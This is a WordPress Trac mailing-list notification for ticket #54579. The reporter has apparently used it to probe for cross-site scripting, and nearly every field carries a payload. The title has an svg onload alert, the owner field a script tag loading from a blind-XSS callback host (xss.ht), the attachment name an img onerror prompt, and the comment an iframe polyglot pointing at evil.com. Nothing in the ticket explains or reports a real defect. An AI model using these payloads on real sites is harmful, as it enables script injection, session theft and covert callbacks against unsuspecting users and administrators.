[wp-trac] [WordPress Trac] #54579: <plaintext> "><svg onload=alert(document.domain)>
WordPress Trac
noreply at wordpress.org
Sat Dec 4 15:43:03 UTC 2021
#54579: <plaintext> "><svg onload=alert(document.domain)>
-------------------------+-------------------------------------------------
Reporter: | Owner: <plaintext><<!\[CDATA[<]]>SCRIPT
rohandevikar1234 | src=https://rohandevikar07.xss.ht>
Type: defect | Status: assigned
(bug) |
Priority: normal | Milestone: Awaiting Review
Component: General | Version:
Severity: normal | Resolution:
Keywords: | Focuses:
<plaintext><imput> |
-------------------------+-------------------------------------------------
Changes (by rohandevikar1234):
* Attachment "%22><img src=x onerror=prompt(document.domain)>.png" added.
<!'/*"/*/'/*/"/*--><IFRAME/src \/\/onload = prompt(1)<x
oncut=alert()>x<IFRAME><IFRAME><IFRAME src=https://evil.com></IFRAME>
--
Ticket URL: <https://core.trac.wordpress.org/ticket/54579>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
More information about the wp-trac
mailing list